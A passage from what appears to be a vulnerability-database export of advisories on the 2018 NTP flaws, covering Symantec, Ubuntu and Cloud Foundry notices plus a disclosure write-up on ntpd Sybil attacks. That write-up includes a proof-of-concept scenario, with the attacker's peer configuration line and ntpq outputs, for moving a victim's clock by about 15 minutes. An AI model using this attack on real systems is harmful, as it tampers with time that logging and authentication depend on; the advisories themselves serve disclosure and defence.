\nAll CVEs | 9.5 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7170 and CVE-2018-7185 | 7.2, 8.1, 8.2 | Not available at this time \n7.1, 7.3, 8.0 | Upgrade to later version with fixes. \nCVE-2018-7182, CVE-2018-7183, \nCVE-2018-7184 | 7.2 | Not available at this time \n \n \n\n**SSL Visibility** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7182 | 5.0 | Not vulnerable, fixed in 5.0.2.1. \n4.5 | Not vulnerable, fixed in 4.5.1.1. \n4.1, 4.2, 4.3, 4.4 | Upgrade to a later version with fixes. \n3.12 | Upgrade to a later version with fixes. \n3.11 | Upgrade to a later version with fixes. \n3.10 | Upgrade to a later version with fixes. \n3.8.4FC | Upgrade to a later version with fixes. \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-7170 | 1.13, 1.14 | Not available at this time \n1.12 | Upgrade to a later version with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2018-7185 | 10.0, 11.0 | A fix will not be provided. \n \n \n\nThe following products contain a vulnerable version of the ntp.org NTP reference implementation, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.1 and later | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.4.2. \n6.6 | Upgrade to later release with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nSymantec Network Protection products do not enable or use all functionality within the ntp.org NTP reference implementation. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. 
However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** all CVEs\n * **CA:** CVE-2018-7170 and CVE-2018-7185\n * **MTD:** CVE-2018-7170 and CVE-2018-7185\n * **MC:** CVE-2018-7170 and CVE-2018-7185\n * **Reporter:** CVE-2018-7170 and CVE-2018-7185\n * **SSLV:** all CVEs except CVE-2018-7182\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nSymantec HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMalware Analysis \nNorman Shark Industrial Control System Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nUnified Agent \n \n**\n\n### ISSUES\n\n**CVE-2018-7170** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 103194](<https://www.securityfocus.com/bid/103194>) / NVD: [CVE-2018-7170](<https://nvd.nist.gov/vuln/detail/CVE-2018-7170>) \n**Impact** | Unauthorized modification of system time \n**Description** | A Sybil vulnerability in ntpd allows remote authenticated NTP servers to establish a large number of ephemeral associations in order to influence the ntpd clock selection algorithm and modify the target's system time. 
\n \n \n\n**CVE-2018-7182** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103191](<https://www.securityfocus.com/bid/103191>) / NVD: [CVE-2018-7182](<https://nvd.nist.gov/vuln/detail/CVE-2018-7182>) \n**Impact** | Denial of service \n**Description** | A buffer overread flaw in ntpd allows a remote attacker to send crafted mode 6 packets and cause denial of service through application crashes. \n \n \n\n**CVE-2018-7183** \n--- \n**Severity / CVSSv2** | High / 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 103351](<https://www.securityfocus.com/bid/103351>) / NVD: [CVE-2018-7183](<https://nvd.nist.gov/vuln/detail/CVE-2018-7183>) \n**Impact** | Denial of service \n**Description** | A buffer overflow flaw in ntpq allows a remote attacker to send a response with a crafted array and execute arbitrary code or cause denial of service. \n \n \n\n**CVE-2018-7184** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103192](<https://www.securityfocus.com/bid/103192>) / NVD: [CVE-2018-7184](<https://nvd.nist.gov/vuln/detail/CVE-2018-7184>) \n**Impact** | Denial of service \n**Description** | A packet handling flaw in ntpd allows a remote attacker to send a packet with a zero-origin timestamp and reset the NTP association. This prevents ntpd from updating the system time until the NTP association resets, resulting in denial of service. \n \n \n\n**CVE-2018-7185** \n--- \n**Severity / CVSSv2** | Medium / 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 103339](<https://www.securityfocus.com/bid/103339>) / NVD: [CVE-2018-7185](<https://nvd.nist.gov/vuln/detail/CVE-2018-7185>) \n**Impact** | Denial of service \n**Description** | A packet handling flaw in ntpd allows a remote attacker to send a packet with a zero-origin timestamp and reset the NTP association. 
\n \n \n\n### MITIGATION\n\nAll CVEs except CVE-2018-7183 can be exploited only through the management network port for Director, MTD, MC, and SSLV. Allowing only machines, IP addresses and subnets from a trusted network to access the management network port reduces the threat of exploiting the vulnerabilities.\n\nBy default, Director does not configure ntpd in symmetric or interleave mode. Customers who leave this behavior unchanged prevent attacks against Director using CVE-2018-7170, CVE-2018-7174, and CVE-2018-7185.\n\nBy default, all versions of Security Analytics do not configure ntpd in symmetric or interleave mode. Customers who leave this behavior unchanged prevent attacks against Security Analytics using CVE-2018-7170 and CVE-2018-7185. Also, Security Analytics 7.2 does not query remote NTP servers using ntpq. Customers who leave this behavior unchanged prevent attacks against Security Analytics 7.2 using CVE-2018-7183. \n \n\n\n### REFERENCES\n\nNTP Security Notice - <https://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S> \n \n\n\n### REVISION \n\n2021-01-15 WI 1.14 is vulnerable to CVE-2018-7170. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-18 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. A fix for Reporter 10.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. 
\n2020-04-17 Content Analysis (CA) 2.4 and later versions are not vulnerable because a fix is available in 2.4.1.1. Reporter 10.5 is not vulnerable because a fix is available in 10.5.1.1. Fixes for Reporter 10.3 and SSLV 4.4 will not be provided. Please upgrade to later versions with the vulnerability fixes. Security Analytics 8.1 is vulnerable to CVE-2018-7170 and CVE-2018-7185. Advanced Secure Gateway (ASG) 7.1 and later are not vulnerable because a fix is available in 7.1.1.1. \n2019-10-07 WI 1.12 and 1.13 are vulnerable to CVE-2018-7170. A fix is not available at this time. \n2019-08-30 Reporter 10.4 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-08-12 A fix for MC 2.0 will not be provided. Please update to a later version with the vulnerability fixes. \n2019-08-09 SSLV 4.5 is not vulnerable because a fix is available in 4.5.1.1. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for SSLV 4.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-27 A fix for CA 2.3 is available in 2.3.5.1. A fix for ASG 6.7 is available in 6.7.4.2. \n2019-02-04 A fix for CA 2.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is vulnerable to CVE-2018-7170 and CVE-2018-7185. \n2019-01-18 SSLV 4.3 and 4.4 are vulnerable to CVE-2018-7182. SSLV 5.0 is not vulnerable because a fix is available in 5.0.2.1. A fix for SSLV 4.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-14 MC 2.1 is not vulnerable because a fix is available in 2.1.1.1. A fix for MC 1.11 will not be provided. Please update to a later version with the vulnerability fixes. 
Reporter 10.3 has a vulnerable version of the NTP reference implementation, but is not vulnerable to known vectors of attack. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please update to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please update to a later version with the vulnerability fixes. \n2018-07-23 Director 6.1 is vulnerable to all CVEs. \n2018-04-26 initial public release\n", "modified": "2021-01-15T20:22:24", "published": "2018-04-26T08:00:00", "id": "SMNTC-1451", "href": "", "type": "symantec", "title": " SA165: NTP Vulnerabilities February 2018", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-16T14:35:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-7185"], "description": "### Description\n\nNTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. NTP version 4.2.6 prior to 4.2.8p11 are vulnerable.\n\n### Technologies Affected\n\n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM Aix 7.2 \n * IBM Vios 2.2.0 \n * IBM Vios 2.2.0.10 \n * IBM Vios 2.2.0.11 \n * IBM Vios 2.2.0.12 \n * IBM Vios 2.2.0.13 \n * IBM Vios 2.2.1.0 \n * IBM Vios 2.2.1.1 \n * IBM Vios 2.2.1.3 \n * IBM Vios 2.2.1.4 \n * IBM Vios 2.2.2.0 \n * IBM Vios 2.2.2.4 \n * IBM Vios 2.2.2.5 \n * IBM Vios 2.2.2.6 \n * IBM Vios 2.2.3 \n * IBM Vios 2.2.3.0 \n * IBM Vios 2.2.3.2 \n * IBM Vios 2.2.3.3 \n * IBM Vios 2.2.3.4 \n * IBM Vios 2.2.3.50 \n * IBM Vios 2.2.4.0 \n * NTP NTP 4.2.6 \n * NTP NTP 4.2.7p11 \n * NTP NTP 4.2.7p111 \n * NTP NTP 4.2.7p22 \n * NTP NTP 4.2.7p366 \n * NTP NTP 4.2.7p385 \n * NTP NTP 4.2.8 \n * NTP NTP 4.2.8p1 \n * NTP NTP 4.2.8p10 \n * NTP NTP 4.2.8p2 \n * NTP NTP 4.2.8p3 \n * NTP NTP 4.2.8p4 \n * NTP NTP 4.2.8p5 \n * NTP NTP 4.2.8p6 \n * NTP NTP 4.2.8p7 \n * NTP NTP 4.2.8p8 \n * NTP NTP 4.2.8p9 \n * Oracle Fujitsu M10-1 Server XCP 2230 \n 
* Oracle Fujitsu M10-1 Server XCP 2271 \n * Oracle Fujitsu M10-1 Server XCP 2280 \n * Oracle Fujitsu M10-1 Server XCP 2290 \n * Oracle Fujitsu M10-1 Server XCP 2320 \n * Oracle Fujitsu M10-1 Server XCP 2360 \n * Oracle Fujitsu M10-1 Server XCP 3050 \n * Oracle Fujitsu M10-1 Server XCP 3052 \n * Oracle Fujitsu M10-1 Server XCP 3053 \n * Oracle Fujitsu M10-1 Server XCP 3060 \n * Oracle Fujitsu M10-4 Server XCP 2230 \n * Oracle Fujitsu M10-4 Server XCP 2271 \n * Oracle Fujitsu M10-4 Server XCP 2280 \n * Oracle Fujitsu M10-4 Server XCP 2290 \n * Oracle Fujitsu M10-4 Server XCP 2320 \n * Oracle Fujitsu M10-4 Server XCP 2360 \n * Oracle Fujitsu M10-4 Server XCP 3050 \n * Oracle Fujitsu M10-4 Server XCP 3052 \n * Oracle Fujitsu M10-4 Server XCP 3053 \n * Oracle Fujitsu M10-4 Server XCP 3060 \n * Oracle Fujitsu M10-4S Server XCP 2230 \n * Oracle Fujitsu M10-4S Server XCP 2271 \n * Oracle Fujitsu M10-4S Server XCP 2280 \n * Oracle Fujitsu M10-4S Server XCP 2290 \n * Oracle Fujitsu M10-4S Server XCP 2320 \n * Oracle Fujitsu M10-4S Server XCP 2360 \n * Oracle Fujitsu M10-4S Server XCP 3050 \n * Oracle Fujitsu M10-4S Server XCP 3052 \n * Oracle Fujitsu M10-4S Server XCP 3053 \n * Oracle Fujitsu M10-4S Server XCP 3060 \n * Oracle Fujitsu M12-1 Server XCP 2230 \n * Oracle Fujitsu M12-1 Server XCP 2290 \n * Oracle Fujitsu M12-1 Server XCP 2320 \n * Oracle Fujitsu M12-1 Server XCP 2360 \n * Oracle Fujitsu M12-1 Server XCP 3000 \n * Oracle Fujitsu M12-1 Server XCP 3050 \n * Oracle Fujitsu M12-1 Server XCP 3052 \n * Oracle Fujitsu M12-1 Server XCP 3053 \n * Oracle Fujitsu M12-1 Server XCP 3060 \n * Oracle Fujitsu M12-2 Server XCP 2230 \n * Oracle Fujitsu M12-2 Server XCP 2290 \n * Oracle Fujitsu M12-2 Server XCP 2320 \n * Oracle Fujitsu M12-2 Server XCP 2360 \n * Oracle Fujitsu M12-2 Server XCP 3000 \n * Oracle Fujitsu M12-2 Server XCP 3050 \n * Oracle Fujitsu M12-2 Server XCP 3052 \n * Oracle Fujitsu M12-2 Server XCP 3053 \n * Oracle Fujitsu M12-2 Server XCP 3060 \n * Oracle 
Fujitsu M12-2S Server XCP 2230 \n * Oracle Fujitsu M12-2S Server XCP 2290 \n * Oracle Fujitsu M12-2S Server XCP 2320 \n * Oracle Fujitsu M12-2S Server XCP 2360 \n * Oracle Fujitsu M12-2S Server XCP 3000 \n * Oracle Fujitsu M12-2S Server XCP 3050 \n * Oracle Fujitsu M12-2S Server XCP 3052 \n * Oracle Fujitsu M12-2S Server XCP 3053 \n * Oracle Fujitsu M12-2S Server XCP 3060 \n * Oracle Solaris 11.3 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of successful exploits.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nAttackers may successfully exploit client flaws in the browser through HTML-injection vulnerabilities. When possible, run all software as a user with minimal privileges and limited access to system resources. Use additional precautions such as restrictive environments to insulate software that may potentially handle malicious content. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as requests containing suspicious URI sequences. Since the webserver may log such requests, review its logs regularly. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2018-02-27T00:00:00", "published": "2018-02-27T00:00:00", "id": "SMNTC-103339", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/103339", "type": "symantec", "title": "NTP CVE-2018-7185 Denial of Service Vulnerability", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:22", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "Yihan Lian discovered that NTP incorrectly handled certain malformed mode 6 \npackets. A remote attacker could possibly use this issue to cause ntpd to \ncrash, resulting in a denial of service. This issue only affected Ubuntu \n17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu \n18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2018-7185)", "edition": 5, "modified": "2018-07-09T00:00:00", "published": "2018-07-09T00:00:00", "id": "USN-3707-1", "href": "https://ubuntu.com/security/notices/USN-3707-1", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T03:05:49", "bulletinFamily": "unix", "cvelist": ["CVE-2019-8936", "CVE-2018-7182"], "description": "It was discovered that the fix for CVE-2018-7182 introduced a NULL pointer \ndereference into NTP. 
An attacker could use this vulnerability to cause a \ndenial of service (crash).", "edition": 1, "modified": "2020-10-01T00:00:00", "published": "2020-10-01T00:00:00", "id": "USN-4563-1", "href": "https://ubuntu.com/security/notices/USN-4563-1", "title": "NTP vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-02T11:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-7427", "CVE-2017-6462", "CVE-2017-6463", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426"], "description": "USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain spoofed \naddresses when performing rate limiting. A remote attacker could possibly \nuse this issue to perform a denial of service. (CVE-2016-7426)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain crafted \nbroadcast mode packets. A remote attacker could possibly use this issue to \nperform a denial of service. (CVE-2016-7427, CVE-2016-7428)\n\nMatthew Van Gundy discovered that NTP incorrectly handled certain control \nmode packets. A remote attacker could use this issue to set or unset traps. \n(CVE-2016-9310)\n\nMatthew Van Gundy discovered that NTP incorrectly handled the trap service. \nA remote attacker could possibly use this issue to cause NTP to crash, resulting \nin a denial of service. (CVE-2016-9311)\n\nIt was discovered that the NTP legacy DPTS refclock driver incorrectly handled \nthe /dev/datum device. A local attacker could possibly use this issue to cause \na denial of service. (CVE-2017-6462)\n\nIt was discovered that NTP incorrectly handled certain invalid settings in a \n:config directive. A remote authenticated user could possibly use this issue \nto cause NTP to crash, resulting in a denial of service. 
(CVE-2017-6463)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. \nA remote attacker could possibly use this issue to execute arbitrary code. \n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain \nzero-origin timestamps. A remote attacker could possibly use this issue to \ncause a denial of service. (CVE-2018-7185)", "edition": 4, "modified": "2019-01-23T00:00:00", "published": "2019-01-23T00:00:00", "id": "USN-3707-2", "href": "https://ubuntu.com/security/notices/USN-3707-2", "title": "NTP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:57", "bulletinFamily": "software", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nYihan Lian discovered that NTP incorrectly handled certain malformed mode 6 packets. A remote attacker could possibly use this issue to cause ntpd to crash, resulting in a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to execute arbitrary code. (CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. A remote attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. (CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. A remote attacker could possibly use this issue to cause a denial of service. 
(CVE-2018-7185)\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.224.0\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.224.0 or later.\n\n# References\n\n * [USN-3707-1](<https://usn.ubuntu.com/3707-1/>)\n * [CVE-2018-7182](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7182>)\n * [CVE-2018-7183](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7183>)\n * [CVE-2018-7184](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7184>)\n * [CVE-2018-7185](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-7185>)\n", "edition": 5, "modified": "2018-07-19T00:00:00", "published": "2018-07-19T00:00:00", "id": "CFOUNDRY:395B2EFFF922C38DE193A0DDFFA06D6E", "href": "https://www.cloudfoundry.org/blog/usn-3707-1/", "title": "USN-3707-1: NTP vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:10:49", "description": "### SUMMARY\r\nntpd is vulnerable to Sybil attacks. A malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win ntpd's clock selection algorithm and modify a victim's clock.\r\n\r\n### TESTED VERSIONS\r\nNTP 4.2.8p3 NTP 4.2.8p4 NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 NTPsec a5fb34b9cc89b92a8fef2f459004865c93bb7f92\r\n\r\n### PRODUCT URLS\r\nhttp://www.ntp.org http://www.ntpsec.org\r\n\r\n### CVSS SCORE\r\nCVSSv2: 3.5 - (AV:N/AC:M/Au:S/C:N/I:P/A:N) CVSSv3: 5.3 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N\r\n\r\n### DETAILS\r\nntpd has the ability to create ephemeral peer associations on the fly in response to certain kinds of incoming requests. 
In most common configurations, if an incoming request will cause a new ephemeral association to be mobilized, ntpd requires the request to be authenticated under a trusted symmetric key. However, ntpd does not enforce any limit on the number of active ephemeral associations that may be created under a single key making ntpd vulnerable to Sybil attacks.\r\n\r\nA malicious authenticated peer can use its knowledge of the trusted key that it shares with a victim ntpd process in order to create multiple ephemeral associations with the victim from different source IP addresses. Each of these malicious associations can advertise false time to the victim. If the malicious associations providing consistent false time advertisements outweigh the number of legitimate peer associations, the victim will sync to the time advertised by the attacker.\r\n\r\nRFC 5905 does not appear to mandate any specific behavior with regard to authenticating ephemeral associations. Therefore, we recommend that an incoming request only mobilize an ephemeral association if both of the following conditions hold:\r\n\r\n* There are no non-preemptible peer associations configured to use that key.\r\nThis prevents ephemeral associations from being created by configured, non-preemptible peers.\r\n* There are no preemptible peer associations authenticated under that key.\r\nThis prevents a malicious ephemeral peer from creating more than one peer association using a given key. 
If the IP address of an ephemeral peer changes, eventually the association will be demobilized at which time a new incoming request can cause a new association to be mobilized with a new IP address.\r\nAn alternative allowing faster failover: when an incoming request will mobilize a new ephemeral association, demobilize all preemptible peer associations authenticated under the key used to authenticate the incoming request before the new association is mobilized.\r\nThis vulnerability has been successfully exploited using symmetric ephemeral associations. However, ephemeral broadcast and manycast associations are also likely to be vulnerable.\r\n\r\nTo our knowledge, any ntpd instance configured using the 'trustedkey' directive is vulnerable, as in:\r\n```\r\nkeys /etc/ntp.keys\r\ntrustedkey 1 ...\r\n```\r\n\r\nThere does not appear to be any other configuration directives that would affect or mitigate this vulnerability. ntpd instances that are not configured with the 'trustedkey' directive are not vulnerable.\r\n\r\nThough this vulnerability has only been confirmed against specific releases of NTP and NTPsec, any release of ntp-3 or ntp-4 may be affected.\r\n\r\n### ATTACK SCENARIO\r\nTo illustrate this attack, a malicious authenticated ephemeral peer (attacker1) with knowledge of keyid 2 trusted by ntp-client-4.2.8p4 will create multiple malicious ephemeral peer associations with ntp-client-4.2.8p4, overwhelm the victim's legitimate time sources, and cause ntp-client-4.2.8p4 to modify its clock. We will illustrate this by querying ntp-client-4.2.8p4 for its active peer associations with:\r\n```\r\nntpq -c lpeer\r\n```\r\n\r\nInitially, ntp-client-4.2.8p4 is peered with one legitimate server (ntp-server).\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 
1 u 5 8 377 0.043 -0.051 0.414\r\n```\r\n\r\nAs a proof-of-concept, the attacker will attempt to move the victim's clock back by an amount just under the panic threshold, 15 minutes in this case. (Significantly larger steps have been achieved with some ntpd releases.) The attacker spins up three attacking nodes at different IP addresses (attacker1..3).\r\n\r\nAfter the attacking nodes are well synchronized, the attacker commences the attack by adding the following configuration line to each attacking node instructing it to peer with the victim using keyid 2:\r\n```\r\npeer ntp-client-4.2.8p4 key 2 noselect minpoll 3 maxpoll 3\r\n```\r\n\r\nAs a result, we see that ntp-client-4.2.8p4 now has 3 new malicious peers.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 3 8 377 0.130 0.479 0.399\r\n attacker1 .LOCL. 1 S 5 8 1 0.000 0.000 0.000\r\n attacker2 192.168.33.14 2 S 5 8 1 0.000 0.000 0.000\r\n attacker3 192.168.33.14 2 S 4 8 1 0.000 0.000 0.000\r\n```\r\n\r\nThe attackers consistently provide time advertisements that are about 15 minutes behind the time advertised by the legitimate ntp-server. Because the attackers outnumber legitimate peers, eventually the victim selects an attacker as its system peer indicating that it will synchronize its time to the attackers.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\nxntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\r\n*attacker1 .LOCL. 1 S 2 8 3 0.457 -931554 0.000\r\n+attacker2 192.168.33.14 2 S 2 8 3 0.644 -931553 0.000\r\n+attacker3 192.168.33.14 2 S 1 8 3 0.583 -931553 0.000\r\n```\r\n\r\nEventually, the victim steps its clock.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n ntp-server .STEP. 
16 u - 8 0 0.000 0.000 0.000\r\n attacker1 .STEP. 16 S 14 8 0 0.000 0.000 0.000\r\n attacker2 .STEP. 16 S 52 8 0 0.000 0.000 0.000\r\n attacker3 .STEP. 16 S 45 8 0 0.000 0.000 0.000\r\n```\r\n\r\nAfter stepping the clock, we see that the victim is 931 seconds behind ntp-server confirming the attack.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 2 8 1 0.379 931553. 0.317\r\n attacker1 .STEP. 16 S 19 8 0 0.000 0.000 0.000\r\n attacker2 .STEP. 16 S 57 8 0 0.000 0.000 0.000\r\n attacker3 .STEP. 16 S 50 8 0 0.000 0.000 0.000\r\n```\r\n\r\nWhile ntp-server is initially selected as the system peer after the clock step, the attacking nodes quickly regain their status as preferred time sources.\r\n```\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\nxntp-server .LOCL. 1 u 5 8 3 0.278 931552. 0.638\r\n*attacker1 .LOCL. 1 S 4 8 6 0.044 -0.346 0.049\r\n+attacker2 192.168.33.14 2 S 4 8 6 0.593 0.520 0.441\r\n+attacker3 192.168.33.14 2 S 3 8 6 0.758 0.020 0.074\r\n```\r\n\r\nAt this point, the attacker has control of the victim's clock and can continue to make modifications.\r\n\r\n### MITIGATION\r\nThe most complete mitigation is to upgrade to ntp-TBD or NTPsec TBD. 
If your system's ntpd is packaged by the system vendor, apply your vendor's security update as soon as it becomes available.\r\n\r\nAdministrators that are not using authenticated NTP can prevent exploitation by removing any unused 'trustedkey' configuration directives from their ntpd configuration file.\r\n\r\nIf your system supports a host-based firewall which blocks incoming traffic, such as the Windows Firewall, Mac OS X Application Firewall, or firewalls such as Uncomplicated Firewall or iptables on Linux, you should enable it.\r\n\r\nFor other systems, appropriate firewall rules will depend on your environment. Use the following recommendations as a guideline:\r\n* NTP clients should block incoming NTP packets from any IP address that is not a known, legitimate peer\r\n* NTP servers should block incoming symmetric active (NTP mode 1), server (NTP mode 4), and broadcast (NTP mode 5) packets from any IP address that is not a known, legitimate peer\r\n\r\n### DETECTION\r\nIn most common configurations, you can use ntpq to query the ntpd process running on your system for its list of peers. Any unexpected peers that are not configured in your ntp.conf file could indicate an attack. For example, if your system is configured to be a client of ntp-server and you expect one peer (known-peer), the appearance of additional peers (sybil) could indicate an attack:\r\n```\r\n$ ntpq -c lpeer\r\n\r\n remote refid st t when poll reach delay offset jitter\r\n==============================================================================\r\n*ntp-server .LOCL. 1 u 1 8 377 0.130 0.479 0.501\r\n known-peer .LOCL. 
